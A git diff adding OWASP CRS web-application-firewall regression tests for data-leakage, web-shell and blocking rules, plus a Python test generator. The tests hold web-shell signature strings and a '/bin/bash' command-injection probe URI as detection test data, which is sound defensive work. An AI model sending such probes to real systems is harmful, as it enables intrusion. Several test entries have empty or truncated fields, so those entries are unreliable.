"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR: invalid input syntax for integer" + output: + log_contains: "id \"951240\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml new file mode 100644 index 00000000..e01973cc --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml 
@@ -0,0 +1,27 @@
+---
+meta:
+ author: "azurit"
+ enabled: true
+ name: "951250.yaml"
+ description: "Regression tests for rule 951250"
+tests:
+ - test_title: 951250-1
+ desc: "Matching SQLite SQL Information Leakage"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: SQLite3::query() [sqlite3.query]: 1 values for 2 columns in /mysite/product.php on line 94"
+ output:
+ log_contains: "id \"951250\""
diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml
new file mode 100644
index 00000000..33c3266c
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml
@@ -0,0 +1,27 @@
+---
+meta:
+ author: "azurit"
+ enabled: true
+ name: "951260.yaml"
+ description: "Regression tests for rule 951260"
+tests:
+ - test_title: 951260-1
+ desc: "Matching Sybase SQL Information Leakage"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: Sybase: Server message: Changed database context to 'rdhiman'. (severity 10, procedure N/A) in guestfatch.php on line 10"
+ output:
+ log_contains: "id \"951260\""
diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml
new file mode 100644
index 00000000..d01496d5
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml
@@ -0,0 +1,107 @@ +--- +meta: + author: "M4tteoP, Esad Cetiner" + enabled: true + name: "953100.yaml" + description: "Tests for rule 953100" +tests: + - test_title: 953100-1 + desc: "'File size is' leads to FPs, it should not match at PL1" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "Maximum allowed file size is 10 MB" + output: + no_log_contains: id "953100" + - test_title: 953100-2 + desc: "'Invalid date' Wordpress FP, it should not match at PL1" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "Invalid date selected" + output: + no_log_contains: id "953100" + - test_title: 953100-3 + desc: "'The function' might lead to FPs, it should not match at PL1" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "please review the function" + output: + no_log_contains: id "953100" + - test_title: 953100-4 + desc: "'Static function' might lead to FPs, it should not match at PL1" + stages: + - stage: + input: 
+ dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "This is a static function" + output: + no_log_contains: id "953100" + - test_title: 953100-5 + desc: "'cannot be empty is too common for PL-1 GH isue #3399" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "Field cannot be empty." + output: + no_log_contains: id "953100" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml new file mode 100644 index 00000000..20f3789d --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml 
@@ -0,0 +1,107 @@ +--- +meta: + author: "M4tteoP, Esad Cetiner" + enabled: true + name: "953101.yaml" + description: "Tests for rule 953101" +tests: + - test_title: 953101-1 + desc: "'File size is' leads to FPs at PL1, it should match at PL2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "Maximum allowed file size is 10 MB" + output: + log_contains: id "953101" + - test_title: 953101-2 + desc: "'Invalid date' leads to FPs at PL1, it should match at PL2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "Invalid date selected" + output: + log_contains: id "953101" + - test_title: 953101-3 + desc: "'The function' might lead to FPs at PL1, it should match at PL2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "Please review the function" + output: + log_contains: id "953101" + - test_title: 953101-4 + desc: "'Static function' might lead to FPs at PL1, it should match at PL2" + stages: + - stage: + 
input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "This is a static function" + output: + log_contains: id "953101" + - test_title: 953101-5 + desc: "'cannot be empty is too common for PL-1, it should match at PL-2 GH isue #3399" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "cannot be empty." + output: + log_contains: id "953101" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml new file mode 100644 index 00000000..89d5ab38 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml @@ -0,0 +1,147 @@ +--- +meta: + author: "fzipi" + enabled: true + name: "953120.yaml" + description: "Positive tests for rule 953120" +tests: + - test_title: 953120-1 + desc: "Just something that returns + output: + log_contains: "id \"953120\"" + - test_title: 953120-2 + desc: "Negative test, returns + output: + log_contains: "id \"953120\"" + - test_title: 953120-6 + desc: "Negative test, returns + output: + log_contains: "id \"953120\"" 
diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml
new file mode 100644
index 00000000..d5fb143d
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml
@@ -0,0 +1,23 @@
+---
+meta:
+ author: "Andrew Howe"
+ enabled: true
+ name: "954100.yaml"
+ description: "Tests for rule 954100"
+tests:
+ - test_title: 954100-1
+ desc: 'Returns C:\inetpub in the response body. Sends as Base64 encoded rather than using /anything to avoid the backslash being escaped in the response.'
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/base64/QzpcaW5ldHB1YiAK"
+ output:
+ log_contains: "id \"954100\""
diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml
new file mode 100644
index 00000000..fc38fa89
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml
@@ -0,0 +1,43 @@ +--- +meta: + author: "Felipe Zipitria" + enabled: true + name: "954120.yaml" + description: "Tests for rule 954120 - IIS Error information disclusure" +tests: + - test_title: 954120-1 + desc: 'Match IIS error page' + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: "POST" + version: "HTTP/1.1" + uri: "/anything" + data: | + text=404.14 - URL too long. + output: + log_contains: id "954120" + - test_title: 954120-2 + desc: 'Match IIS error page' + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: "POST" + version: "HTTP/1.1" + uri: "/anything" + data: | + text=500.15 - Server error: Direct requests for GLOBAL.ASA are not allowed. + output: + log_contains: id "954120" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml new file mode 100644 index 00000000..bd60930d --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml 
@@ -0,0 +1,70 @@ +--- +meta: + author: "azurit" + enabled: true + name: "955100.yaml" + description: "Regression tests for rule 955100" +tests: + - test_title: 955100-1 + desc: "Matching web shell NCC Shell" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: | +

.:NCC:. Shell v + output: + log_contains: "id \"955100\"" + - test_title: 955100-2 + desc: "Matching web shell Simple PHP backdoor" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: | + + output: + log_contains: "id \"955100\"" + - test_title: 955100-3 + desc: "Matching web shell WinX Shell" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: | + -:[GreenwooD]:- WinX Shell + output: + log_contains: "id \"955100\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml new file mode 100644 index 00000000..38d62b5f --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml 
@@ -0,0 +1,71 @@ +--- +meta: + author: "studersi" + enabled: true + name: "959100.yaml" + description: | + Test whether the outbound blocking mechanism works by testing whether rule 959100 is triggered. + For these tests, existing test are repurposed with different assertions. Instead of asserting that the original + rules are triggered that the tests are written for, we assert that triggering these rules causes the blocking + rule to be triggered. +tests: + - test_title: 959100-1 + desc: Test is basically identical to 953120-0 (PHP leakage positive test in phase 4) but here we assert that the outbound blocking mechanism is triggered + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: + output: + log_contains: "id \"959100\"" + - test_title: 959100-2 + desc: Test is basically identical to 953120-1 (PHP leakage negative test in phase 4) but here we assert that the outbound blocking mechanism is not triggered + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: + output: + log_contains: "Outbound Anomaly Score Exceeded [(]Total Score: " diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml new file mode 100644 index 00000000..563d6cfc 
--- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml 
@@ -0,0 +1,66 @@ +--- +meta: + author: "studersi" + enabled: true + name: "980170.yaml" + description: | + Test whether level 4 inbound reporting in phase 5 works by testing whether rule 980170 is triggered. + For these tests, existing test are repurposed with different assertions. Instead of asserting that the original + rules are triggered that the tests are written for, we assert that triggering these rules causes the corresponding + reporting rules to be triggered. +tests: + - test_title: 980170-1 + desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is logged that was blocked + stages: + - stage: + input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "127.0.0.1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + protocol: "http" + # Will match rules + # - 920273: restricted characters violation + # - 920350: numeric IP in Host header + # - 932160: Unix remote command execution + # - 932236: Unix command injection + # - 932260: Unix remote command execution + uri: "/?a=/bin/bash" + output: + log_contains: "id \"980170\"" + - test_title: 980170-2 + desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is logged that scored but was not blocked + stages: + - stage: + input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + # Will match rule 920350: numeric IP in Host header + Host: "127.0.0.1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + protocol: "http" + uri: "/" + output: + log_contains: "id \"980170\"" + - test_title: 980170-3 + desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is not logged that did not score + stages: + - stage: + input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP 
CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + protocol: "http" + uri: "/" + output: + no_log_contains: "id \"980170\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/base_positive_rules.py b/nginx/config/owasp-crs/tests/regression/tests/base_positive_rules.py new file mode 100755 index 00000000..b0dc08db --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/base_positive_rules.py 
@@ -0,0 +1,104 @@
+#!/usr/bin/env python
+#@spartantri 2018
+
+import sys
+import argparse
+import base64
+
+parser = argparse.ArgumentParser()
+
+UserAgent="ModSecurity CRS 3 Tests"
+Accept="text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+AcceptCharset="ISO-8859-1,utf-8;q=0.7,*;q=0.7"
+AcceptEncoding="gzip,deflate"
+AcceptLanguage="en-us,en;q=0.5"
+ContentType="application/x-www-form-urlencoded"
+payloads=[]
+skeletontest=0
+Meta='''---
+ meta:
+ author: "spartantri"
+ enabled: true
+ name: "skeletonid.yaml"
+ description: "Positive tests for rule skeletonid"
+ tests:
+'''
+
+parser.add_argument('-a', action='store', dest='Addr', help='Target ip address',
+ default='127.0.0.1')
+parser.add_argument('-p', action='store', dest='Port', help='Target port',
+ default='80')
+parser.add_argument('-v', action='store', dest='Host', help='Target virtual host',
+ default='localhost')
+parser.add_argument('-s', action='store', dest='skeleton', help='Skeleton file',
+ default='positivetest.yaml.skeleton')
+parser.add_argument('-o', action='store', dest='output', help='output file',
+ default='')
+parser.add_argument('-r', action='store', dest='ruleid', help='Rule id',
+ default='944310')
+parser.add_argument('-k', action='store', dest='combined_payload', help='Keyword containing combined pipe separated payloads',
+ default='')
+parser.add_argument('-i', action='append', dest='list_payload', help='Keyword containing individual payload',
+ default=[])
+parser.add_argument('-c', action='store', dest='prefix', help='Prefix keyword for all payloads',
+ default='')
+parser.add_argument('-e', action='store', dest='sufix', help='Sufix keyword for all payloads',
+ default='')
+parser.add_argument('-b', action='store_true', dest='base64encode', help='Encode payload using Base64',
+ default=False)
+parser.add_argument('-d', action='store_true', dest='demo', help='Print demo rules if no data is provided',
+ default=False)
+parser.add_argument('-t', action='store_true', dest='test', help='Launch FTW and test output',
+ default=False)
+parser.add_argument('-w', action='store', dest='author', help='Test author',
+ default='spartantri')
+start_options = parser.parse_args()
+
+if len(sys.argv)<2 and not start_options.demo:
+ parser.print_usage()
+ exit()
+
+for p in start_options.combined_payload.split('|'):
+ if p not in payloads:
+ # print('Checking %s' % (p))
+ if len(p)>0:
+ payloads.append(''.join([start_options.prefix, p, start_options.sufix]))
+
+for p in start_options.list_payload:
+ payloads.append(''.join([start_options.prefix, p, start_options.sufix]))
+
+if start_options.output=='':
+ o=sys.stdout
+else:
+ o=open(start_options.output, 'w')
+
+o.write(Meta.replace('skeletonid', start_options.ruleid).replace('spartantri', start_options.author))
+for item in payloads:
+ if start_options.base64encode:
+ payload=base64.encodestring(item).replace('\n', '')
+ #print payload
+ else:
+ payload=item
+ with open(start_options.skeleton,'r') as f:
+ for l in f:
+ l=l.replace('skeletonid', start_options.ruleid)
+ l=l.replace('skeletonkeyword', payload)
+ l=l.replace('skeletondefaultaddr', start_options.Addr)
+ l=l.replace('skeletondefaultport', start_options.Port)
+ l=l.replace('skeletondefaulthost', start_options.Host)
+ l=l.replace('skeletondefaultuseragent', UserAgent)
+ l=l.replace('skeletondefaultacceptcharset', AcceptCharset)
+ l=l.replace('skeletondefaultacceptencoding', AcceptEncoding)
+ l=l.replace('skeletondefaultacceptlanguage', AcceptLanguage)
+ l=l.replace('skeletondefaultcontenttype', ContentType)
+ l=l.replace('skeletondefaultaccept', Accept)
+ if 'skeletontest' in l:
+ l=l.replace('skeletontest', str(skeletontest))
+ skeletontest+=1
+ o.write(l)
+
+if start_options.output != '':
+ print ('Generated %s rules to file %s' % (str(skeletontest), start_options.output))
+ o.close()
+
+#print('\nGenerated %s tests' % (str(skeletontest)))
diff --git a/nginx/config/owasp-crs/tests/regression/tests/positivetest-light.yaml.skeleton b/nginx/config/owasp-crs/tests/regression/tests/positivetest-light.yaml.skeleton new file mode 100644 index 00000000..65ca4956 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/positivetest-light.yaml.skeleton 
@@ -0,0 +1,255 @@ + - + test_title: skeletonid-skeletontest + desc: "Argument test includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Argument name includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword=test" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Cookie test includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: test=skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Cookie name includes keyword 
skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: skeletonkeyword=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Request header test includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + test: skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "XML attribute value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "XML element value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: 
skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Nested XML element value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type text/plain includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type application/json arg value includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: 
